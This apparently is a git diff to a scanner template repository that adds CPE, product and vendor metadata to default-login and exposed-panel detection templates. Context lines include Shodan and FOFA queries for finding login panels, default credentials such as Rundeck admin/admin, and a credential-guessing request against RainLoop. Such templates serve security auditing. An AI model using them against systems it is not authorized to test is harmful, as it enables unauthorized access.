cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:openmediavault:openmediavault:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"OpenMediaVault" + product: openmediavault + vendor: openmediavault tags: default-login,openmediavault http: diff --git a/http/default-logins/oracle/peoplesoft-default-login.yaml b/http/default-logins/oracle/peoplesoft-default-login.yaml index 101d43d24e..0ef956ac2f 100644 --- a/http/default-logins/oracle/peoplesoft-default-login.yaml +++ b/http/default-logins/oracle/peoplesoft-default-login.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:*:*:*:*:*:*:*:* metadata: verified: true max-request: 200 shodan-query: title:"Oracle PeopleSoft Sign-in" + product: peoplesoft_enterprise_peopletools + vendor: oracle tags: default-login,peoplesoft,oracle,fuzz http: @@ -82,4 +85,4 @@ http: - type: status status: - 302 -# digest: 490a00463044022021caed0d7676a38577b2c3d3b6a6549f5bcb9942d4b96265587f639ae486006502203ec6b9e3cce73f65f0aaffe2ae6ea2835d44c5431bd579f08d3fe2450ccedb74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022021caed0d7676a38577b2c3d3b6a6549f5bcb9942d4b96265587f639ae486006502203ec6b9e3cce73f65f0aaffe2ae6ea2835d44c5431bd579f08d3fe2450ccedb74:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/others/aruba-instant-default-login.yaml b/http/default-logins/others/aruba-instant-default-login.yaml index 55b9e832cc..8692146699 100755 --- a/http/default-logins/others/aruba-instant-default-login.yaml +++ b/http/default-logins/others/aruba-instant-default-login.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js" + product: aruba_instant + vendor: arubanetworks tags: aruba,default-login + classification: + cpe: cpe:2.3:a:arubanetworks:aruba_instant:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/default-logins/others/inspur-clusterengine-default-login.yaml b/http/default-logins/others/inspur-clusterengine-default-login.yaml index 95694fdd36..5cf5cb1119 100644 --- a/http/default-logins/others/inspur-clusterengine-default-login.yaml +++ b/http/default-logins/others/inspur-clusterengine-default-login.yaml @@ -10,8 +10,12 @@ info: metadata: max-request: 1 fofa-query: title="TSCEV4.0" + product: clusterengine + vendor: inspur tags: default-login,inspur,clusterengine + classification: + cpe: cpe:2.3:a:inspur:clusterengine:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/default-logins/others/opencats-default-login.yaml b/http/default-logins/others/opencats-default-login.yaml index 6b884ae74a..ab8a6da466 100644 --- a/http/default-logins/others/opencats-default-login.yaml +++ b/http/default-logins/others/opencats-default-login.yaml @@ -9,10 +9,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:opencats:opencats:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 shodan-query: title:"opencats" + product: opencats + vendor: opencats tags: default-login,opencats http: diff --git a/http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml b/http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml index cebc1db613..88cfbb6385 100644 --- a/http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml +++ b/http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 16 shodan-query: http.title:phpMyAdmin + product: phpmyadmin + vendor: phpmyadmin tags: default-login,phpmyadmin http: diff --git a/http/default-logins/powerjob-default-login.yaml b/http/default-logins/powerjob-default-login.yaml index 8943877a38..6f7c724da7 100644 --- a/http/default-logins/powerjob-default-login.yaml +++ b/http/default-logins/powerjob-default-login.yaml @@ -13,8 +13,12 @@ info: max-request: 1 shodan-query: http.title:"PowerJob" fofa-query: title="PowerJob" + product: powerjob + vendor: powerjob tags: powerjob,default-login + classification: + cpe: cpe:2.3:a:powerjob:powerjob:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/default-logins/prtg/prtg-default-login.yaml b/http/default-logins/prtg/prtg-default-login.yaml index 5260fec1cf..c966c4448f 100644 --- a/http/default-logins/prtg/prtg-default-login.yaml +++ b/http/default-logins/prtg/prtg-default-login.yaml @@ -9,9 +9,12 @@ info: - https://www.paessler.com/manuals/prtg/login classification: cwe-id: CWE-798 + cpe: cpe:2.3:a:paessler:prtg_network_monitor:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.favicon.hash:-655683626 + product: prtg_network_monitor + vendor: paessler tags: prtg,default-login http: diff --git a/http/default-logins/pyload/pyload-default-login.yaml b/http/default-logins/pyload/pyload-default-login.yaml index b626545bb3..c6681d6b8a 100644 --- a/http/default-logins/pyload/pyload-default-login.yaml +++ b/http/default-logins/pyload/pyload-default-login.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: html:"pyload" + product: pyload + vendor: pyload tags: default-login,pyload + classification: + cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/default-logins/rainloop/rainloop-default-login.yaml b/http/default-logins/rainloop/rainloop-default-login.yaml index 48b5f927a4..aeda740ba2 100644 --- a/http/default-logins/rainloop/rainloop-default-login.yaml +++ b/http/default-logins/rainloop/rainloop-default-login.yaml @@ -11,11 +11,15 @@ info: verified: true max-request: 2 fofa-query: app="RAINLOOP-WebMail" + product: webmail + vendor: rainloop tags: default-login,rainloop,webmail,foss + classification: + cpe: cpe:2.3:a:rainloop:webmail:*:*:*:*:*:*:*:* http: - raw: - - | # Login Portal: /?admin + - | GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1 Host: {{Hostname}} - | @@ -24,7 +28,6 @@ http: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Login={{user}}&Password={{pass}}&Action=AdminLogin&XToken={{token}} - attack: pitchfork payloads: user: diff --git a/http/default-logins/rconfig-default-login.yaml b/http/default-logins/rconfig-default-login.yaml index d162877112..0054a5e753 100644 --- a/http/default-logins/rconfig-default-login.yaml +++ b/http/default-logins/rconfig-default-login.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 2 shodan-query: http.title:"rConfig" + product: rconfig + vendor: rconfig tags: rconfig,default-login + classification: + cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/default-logins/riello/netman-default-login.yaml b/http/default-logins/riello/netman-default-login.yaml index 7092f23918..d93517ca21 100644 --- a/http/default-logins/riello/netman-default-login.yaml +++ b/http/default-logins/riello/netman-default-login.yaml @@ -13,8 +13,12 @@ info: max-request: 1 shodan-query: title:"Netman" censys-query: services.http.response.body:"Netman204" + product: netman_204_firmware + vendor: riello-ups tags: default-login,netman + classification: + cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/default-logins/rundeck/rundeck-default-login.yaml b/http/default-logins/rundeck/rundeck-default-login.yaml index 7b44d5d3a8..08049adb07 100644 --- a/http/default-logins/rundeck/rundeck-default-login.yaml +++ b/http/default-logins/rundeck/rundeck-default-login.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 2 fofa-query: app="Rundeck-Login" + product: rundeck + vendor: pagerduty tags: default-login,rundeck + classification: + cpe: cpe:2.3:a:pagerduty:rundeck:*:*:*:*:*:*:*:* variables: username: admin password: admin @@ -44,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fef40e31264843e21f89a843ba6f31f4109ca0016824152fbaf590c8371c9cc5022076659b8514e4eba7270ea5232d9f8545423a000bdf1274b7fc95aa9caa0cb968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fef40e31264843e21f89a843ba6f31f4109ca0016824152fbaf590c8371c9cc5022076659b8514e4eba7270ea5232d9f8545423a000bdf1274b7fc95aa9caa0cb968:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/samsung/samsung-printer-default-login.yaml b/http/default-logins/samsung/samsung-printer-default-login.yaml index 9066d8fb60..6073694405 100644 --- a/http/default-logins/samsung/samsung-printer-default-login.yaml +++ b/http/default-logins/samsung/samsung-printer-default-login.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:h:samsung:scx-6555n:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"SyncThru Web Service" + product: scx-6555n + vendor: samsung tags: default-login,iot,samsung,printer http: diff --git a/http/default-logins/seeddms/seeddms-default-login.yaml b/http/default-logins/seeddms/seeddms-default-login.yaml index ee758e2f50..d1a05bca8c 100644 --- a/http/default-logins/seeddms/seeddms-default-login.yaml +++ b/http/default-logins/seeddms/seeddms-default-login.yaml @@ -12,9 +12,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:seeddms:seeddms:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"SeedDMS" + product: seeddms + vendor: seeddms tags: default-login,seeddms http: diff --git a/http/default-logins/softether/softether-vpn-default-login.yaml b/http/default-logins/softether/softether-vpn-default-login.yaml index 42fde94b7c..98c86b3cc0 100644 --- a/http/default-logins/softether/softether-vpn-default-login.yaml +++ b/http/default-logins/softether/softether-vpn-default-login.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: title:"SoftEther VPN Server" + product: vpn + vendor: softether tags: misconfig,vpn,softether,default-login + classification: + cpe: cpe:2.3:a:softether:vpn:*:*:*:*:*:*:*:* http: - raw: - | @@ -26,7 +30,7 @@ http: username: - administrator password: - - + - matchers-condition: and matchers: @@ -40,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205c1ef0dce69c50da55acaa53406c82710813d759723176e6ef4e4fee858b7bca02200b895a7367f4e624433a856e0dbf9d38de950d2d115ca5c5527c82ad81ba5394:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205c1ef0dce69c50da55acaa53406c82710813d759723176e6ef4e4fee858b7bca02200b895a7367f4e624433a856e0dbf9d38de950d2d115ca5c5527c82ad81ba5394:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/sonarqube/sonarqube-default-login.yaml b/http/default-logins/sonarqube/sonarqube-default-login.yaml index 66ae12041b..c93582783e 100644 --- a/http/default-logins/sonarqube/sonarqube-default-login.yaml +++ b/http/default-logins/sonarqube/sonarqube-default-login.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:sonarsource:sonarqube:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 shodan-query: title:"Sonarqube" + product: sonarqube + vendor: sonarsource tags: default-login,sonarqube http: diff --git a/http/default-logins/splunk/splunk-default-login.yaml b/http/default-logins/splunk/splunk-default-login.yaml index 8afecbbefe..a25fe918ac 100644 --- a/http/default-logins/splunk/splunk-default-login.yaml +++ b/http/default-logins/splunk/splunk-default-login.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 9 shodan-query: http.title:"Splunk" + product: splunk + vendor: splunk tags: default-login,splunk + classification: + cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* http: - raw: - | @@ -66,4 +70,4 @@ http: part: header regex: - 'cval=([0-9]+)' -# digest: 4b0a00483046022100ce91d4b9bd6a78ad0f1da61f3e9222cdb9db0f17bd4baa08ad302f1a57013161022100f2a44470cac093eedcba91b9a41d16f1c1141f063824121f54ebe9568bfab88f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ce91d4b9bd6a78ad0f1da61f3e9222cdb9db0f17bd4baa08ad302f1a57013161022100f2a44470cac093eedcba91b9a41d16f1c1141f063824121f54ebe9568bfab88f:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/stackstorm/stackstorm-default-login.yaml b/http/default-logins/stackstorm/stackstorm-default-login.yaml index 3c4c0d3ac7..8d38c35af9 100644 --- a/http/default-logins/stackstorm/stackstorm-default-login.yaml +++ b/http/default-logins/stackstorm/stackstorm-default-login.yaml @@ -11,9 +11,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:stackstorm:stackstorm:*:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: app="stackstorm" + product: stackstorm + vendor: stackstorm tags: stackstorm,default-login http: diff --git a/http/default-logins/steve/steve-default-login.yaml b/http/default-logins/steve/steve-default-login.yaml index 5fe92b1de0..5244893825 100644 --- a/http/default-logins/steve/steve-default-login.yaml +++ b/http/default-logins/steve/steve-default-login.yaml @@ -13,11 +13,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:steve-community:steve:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.title:"SteVe - Steckdosenverwaltung" google-query: intitle:"SteVe - Steckdosenverwaltung" + product: steve + vendor: steve-community tags: panel,default-login,steve http: diff --git a/http/default-logins/tiny-file-manager-default-login.yaml b/http/default-logins/tiny-file-manager-default-login.yaml index 994cc8da31..5710d8ac9d 100644 --- a/http/default-logins/tiny-file-manager-default-login.yaml +++ b/http/default-logins/tiny-file-manager-default-login.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:tinyfilemanager_project:tinyfilemanager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 shodan-query: html:"Tiny File Manager" + product: tinyfilemanager + vendor: tinyfilemanager_project tags: default-login,tiny,filemanager http: diff --git a/http/default-logins/tooljet/tooljet-default-login.yaml b/http/default-logins/tooljet/tooljet-default-login.yaml index cc0acc9416..a049b368bb 100644 --- a/http/default-logins/tooljet/tooljet-default-login.yaml +++ b/http/default-logins/tooljet/tooljet-default-login.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:tooljet:tooljet:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"tooljet" + product: tooljet + vendor: tooljet tags: default-login,tooljet http: diff --git a/http/default-logins/versa/versa-flexvnf-default-login.yaml b/http/default-logins/versa/versa-flexvnf-default-login.yaml index 77340f1781..2b1be13af1 100644 --- a/http/default-logins/versa/versa-flexvnf-default-login.yaml +++ b/http/default-logins/versa/versa-flexvnf-default-login.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:o:versa-networks:versa_operating_system:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 shodan-query: title:"Flex VNF Web-UI" + product: versa_operating_system + vendor: versa-networks tags: default-login,versa,flexvnf http: diff --git a/http/default-logins/wazuh-default-login.yaml b/http/default-logins/wazuh-default-login.yaml index bb7941c4d8..14cf15ea05 100644 --- a/http/default-logins/wazuh-default-login.yaml +++ b/http/default-logins/wazuh-default-login.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 7 shodan-query: "title:\"Wazuh\"" + product: wazuh + vendor: wazuh tags: wazuh,default-login + classification: + cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:* http: - method: GET path: @@ -69,4 +73,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009455b6beb3dd3660a1acfbfb547e2a94b8160fcbf9501c51f246568d7d26b21702204c46b154f7b28cad6aa4a6fc66515aff039e95ba59642d2b70729598de351bdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009455b6beb3dd3660a1acfbfb547e2a94b8160fcbf9501c51f246568d7d26b21702204c46b154f7b28cad6aa4a6fc66515aff039e95ba59642d2b70729598de351bdb:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/webmethod/webmethod-integration-default-login.yaml b/http/default-logins/webmethod/webmethod-integration-default-login.yaml index 595c70e092..8f6de78a7b 100644 --- a/http/default-logins/webmethod/webmethod-integration-default-login.yaml +++ b/http/default-logins/webmethod/webmethod-integration-default-login.yaml @@ -10,7 +10,11 @@ info: verified: true max-request: 5 shodan-query: "http.favicon.hash:-234335289" + product: webmethods + vendor: softwareag tags: default-login,webmethod + classification: + cpe: cpe:2.3:a:softwareag:webmethods:*:*:*:*:*:*:*:* flow: http(1) && http(2) http: @@ -63,4 +67,4 @@ http: - Invalid credentials negative: true condition: and -# digest: 4a0a00473045022100ad4f93ac5744b9b82b0f40b400f65237195db254af03f8af318f97a66bf5885802206bf7da16c81861266751ba6bc4bf14fc33c4a3319ff239f15b5557348e09a9af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad4f93ac5744b9b82b0f40b400f65237195db254af03f8af318f97a66bf5885802206bf7da16c81861266751ba6bc4bf14fc33c4a3319ff239f15b5557348e09a9af:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/webmin-default-login.yaml b/http/default-logins/webmin-default-login.yaml index cd6b23c7bb..7bf6a50085 100644 --- a/http/default-logins/webmin-default-login.yaml +++ b/http/default-logins/webmin-default-login.yaml @@ -11,10 +11,13 @@ info: - https://doxfer.webmin.com/Webmin/Installing_Webmin classification: cwe-id: CWE-798 + cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: title:"Webmin" + product: webmin + vendor: webmin tags: webmin,default-login http: diff --git a/http/default-logins/xnat/xnat-default-login.yaml b/http/default-logins/xnat/xnat-default-login.yaml index cb5842931a..9591e36726 100644 --- a/http/default-logins/xnat/xnat-default-login.yaml +++ b/http/default-logins/xnat/xnat-default-login.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:xnat:xnat:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"XNAT" + product: xnat + vendor: xnat tags: default-login,xnat http: diff --git a/http/default-logins/xui/xui-default-login.yaml b/http/default-logins/xui/xui-default-login.yaml index 1190cbb647..5075e1a7ef 100644 --- a/http/default-logins/xui/xui-default-login.yaml +++ b/http/default-logins/xui/xui-default-login.yaml @@ -11,11 +11,14 @@ info: - https://seakfind.github.io/2021/10/10/X-UI/#:~:text=By%20default%2C%20the%20login%20user,the%20password%20is%20also%20admin%20. classification: cwe-id: CWE-798 + cpe: cpe:2.3:a:vaxilu:x-ui:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 fofa-query: title="X-UI Login" shodan-query: title:"X-UI Login" + product: x-ui + vendor: vaxilu tags: x-ui,default-login http: @@ -48,4 +51,4 @@ http: - "contains(http_2_header, 'application/json')" - "http_2_status_code == 200" condition: and -# digest: 490a00463044021f4d76b49e02f27ca2bcbf6564481dba460a4c5dff556b17641349307a0b86ac022100ce475244644645c3aebbe048b946bf4b0e4f9dbe44be1516764a4150adedfcce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f4d76b49e02f27ca2bcbf6564481dba460a4c5dff556b17641349307a0b86ac022100ce475244644645c3aebbe048b946bf4b0e4f9dbe44be1516764a4150adedfcce:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/acti-panel.yaml b/http/exposed-panels/acti-panel.yaml index b98a8bd69b..7243bf1045 100644 --- a/http/exposed-panels/acti-panel.yaml +++ b/http/exposed-panels/acti-panel.yaml @@ -9,8 +9,12 @@ info: max-request: 1 shodan-query: title:"Web Configurator" html:"ACTi" fofa-query: app="ACTi-视频监控" + product: camera_firmware + vendor: acti tags: acti,panel,login,detect + classification: + cpe: cpe:2.3:o:acti:camera_firmware:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202ff45925f682afb5561ce24b6edb6a297d24f4b8bb8e68ddaa8f74ebb6bdf51202201064bc5389f172c1cce1197e8715c77af9f209193cc6b3a7b4f0965cb0183303:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202ff45925f682afb5561ce24b6edb6a297d24f4b8bb8e68ddaa8f74ebb6bdf51202201064bc5389f172c1cce1197e8715c77af9f209193cc6b3a7b4f0965cb0183303:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/acunetix-login.yaml b/http/exposed-panels/acunetix-login.yaml index 7d7dcd0165..65b55cb704 100644 --- a/http/exposed-panels/acunetix-login.yaml +++ b/http/exposed-panels/acunetix-login.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:acunetix:web_vulnerability_scanner:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Acunetix" + product: web_vulnerability_scanner + vendor: acunetix tags: panel,acunetix http: @@ -36,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c3e0a36f23ada0e56b591d0157c75e124b21bda54ba9b3420bfb0a9bd53dc8430220756e3635374e9bcb62d53bd2c01ec6e7e51d7b68a5ae5dfde55c90058f3e66e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c3e0a36f23ada0e56b591d0157c75e124b21bda54ba9b3420bfb0a9bd53dc8430220756e3635374e9bcb62d53bd2c01ec6e7e51d7b68a5ae5dfde55c90058f3e66e3:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/adguard-panel.yaml b/http/exposed-panels/adguard-panel.yaml index 6f353815b0..f228123337 100644 --- a/http/exposed-panels/adguard-panel.yaml +++ b/http/exposed-panels/adguard-panel.yaml @@ -10,8 +10,12 @@ info: max-request: 1 verified: true fofa-query: title="AdGuard Home" + product: adguard + vendor: adguard tags: adguard,panel,login,detect + classification: + cpe: cpe:2.3:a:adguard:adguard:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220730adc9fcdcc4df45177d9cfab02b37df33d1945732441c4dac5811faf288eb902206f66cb45c1b423bfe9a4e9511d534b50f575855c1f5c26bf533e3a81db6fe63c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220730adc9fcdcc4df45177d9cfab02b37df33d1945732441c4dac5811faf288eb902206f66cb45c1b423bfe9a4e9511d534b50f575855c1f5c26bf533e3a81db6fe63c:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/aerohive-netconfig-ui.yaml b/http/exposed-panels/aerohive-netconfig-ui.yaml index 4293e07439..e0492d9203 100644 --- a/http/exposed-panels/aerohive-netconfig-ui.yaml +++ b/http/exposed-panels/aerohive-netconfig-ui.yaml @@ -9,9 +9,12 @@ info: - https://docs.aerohive.com/330000/docs/help/english/ng/Content/reference/docs/online-help-systems.htm classification: cwe-id: CWE-200 + cpe: cpe:2.3:h:extremenetworks:aerohive_netconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Aerohive NetConfig UI" + product: aerohive_netconfig + vendor: extremenetworks tags: panel,tech,hiveos,aerohive http: diff --git a/http/exposed-panels/aircube-dashboard-panel.yaml b/http/exposed-panels/aircube-dashboard-panel.yaml index 79ab4f6fe9..e2a01c05fe 100644 --- a/http/exposed-panels/aircube-dashboard-panel.yaml +++ b/http/exposed-panels/aircube-dashboard-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:h:ui:aircube:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"AirCube Dashboard" + product: aircube + vendor: ui tags: panel,aircube http: @@ -29,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b5af67268d961cd4856f5808774eaeaa35c49d04408c0f33e325dd648cb4ca32022100b7f08a862ffbfd4d633dab083729b514115fbb0a95c4e5f19cb1ef2160abc4c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5af67268d961cd4856f5808774eaeaa35c49d04408c0f33e325dd648cb4ca32022100b7f08a862ffbfd4d633dab083729b514115fbb0a95c4e5f19cb1ef2160abc4c3:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/aircube-login.yaml b/http/exposed-panels/aircube-login.yaml index 66c87ef5ea..5cddec93ad 100644 --- a/http/exposed-panels/aircube-login.yaml +++ b/http/exposed-panels/aircube-login.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:h:ui:aircube:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.favicon.hash:1249285083 + product: aircube + vendor: ui tags: panel,aircube,ubiquiti http: @@ -29,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022057fb9a047f901b76ea05b3d4d9a7f0c03bf623505b92411811e8d4d43013b5be022100bef2d505c08ccb84b6d838ee36c64039e98ec6d9c239cc217391606d52ed87b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022057fb9a047f901b76ea05b3d4d9a7f0c03bf623505b92411811e8d4d43013b5be022100bef2d505c08ccb84b6d838ee36c64039e98ec6d9c239cc217391606d52ed87b4:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/airos-panel.yaml b/http/exposed-panels/airos-panel.yaml index 13afaf1ce8..37e1b75251 100644 --- a/http/exposed-panels/airos-panel.yaml +++ b/http/exposed-panels/airos-panel.yaml @@ -1,30 +1,34 @@ -id: airos-panel - -info: - name: AirOS Panel - Detect - author: rxerium - severity: info - description: | - AirOS panel was detected. - metadata: - verified: true - max-request: 1 - shodan-query: "http.favicon.hash:-697231354" - tags: airos,panel - -http: - - method: GET - path: - - "{{BaseURL}}/login.cgi?uri=/" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'airos_logo.png' - - - type: status - status: +id: airos-panel + +info: + name: AirOS Panel - Detect + author: rxerium + severity: info + description: | + AirOS panel was detected. + metadata: + verified: true + max-request: 1 + shodan-query: "http.favicon.hash:-697231354" + product: airos + vendor: ui + tags: airos,panel + + classification: + cpe: cpe:2.3:o:ui:airos:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}/login.cgi?uri=/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'airos_logo.png' + + - type: status + status: - 200 -# digest: 490a00463044022029f1587f6c760a398c179915decdd1c6f7492d915a4cda673ba9be590756dc5802207e0d46fae9185acbfe36d2c9bea4822152a5ea03b718f73fd56f17bf2d7ec4c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029f1587f6c760a398c179915decdd1c6f7492d915a4cda673ba9be590756dc5802207e0d46fae9185acbfe36d2c9bea4822152a5ea03b718f73fd56f17bf2d7ec4c5:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/ansible-semaphore-panel.yaml b/http/exposed-panels/ansible-semaphore-panel.yaml index 1f9c74a824..8fa3b53233 100644 --- a/http/exposed-panels/ansible-semaphore-panel.yaml +++ b/http/exposed-panels/ansible-semaphore-panel.yaml @@ -10,9 +10,12 @@ info: - https://github.com/ansible-semaphore/semaphore classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:ansible-semaphore:ansible_semaphore:*:*:*:*:ansible:*:*:* metadata: max-request: 1 shodan-query: http.html:"Semaphore" + product: ansible_semaphore + vendor: ansible-semaphore tags: panel,ansible,semaphore,cicd,oss http: diff --git a/http/exposed-panels/apache/apache-apollo-panel.yaml b/http/exposed-panels/apache/apache-apollo-panel.yaml index 3d34aaf1a4..cf0cb9a6a1 100644 --- a/http/exposed-panels/apache/apache-apollo-panel.yaml +++ b/http/exposed-panels/apache/apache-apollo-panel.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title:"Apache Apollo" + product: activemq_apollo + vendor: apache tags: panel,apache,apollo,login,detect + classification: + cpe: cpe:2.3:a:apache:activemq_apollo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - type: status status: - 200 -# digest: 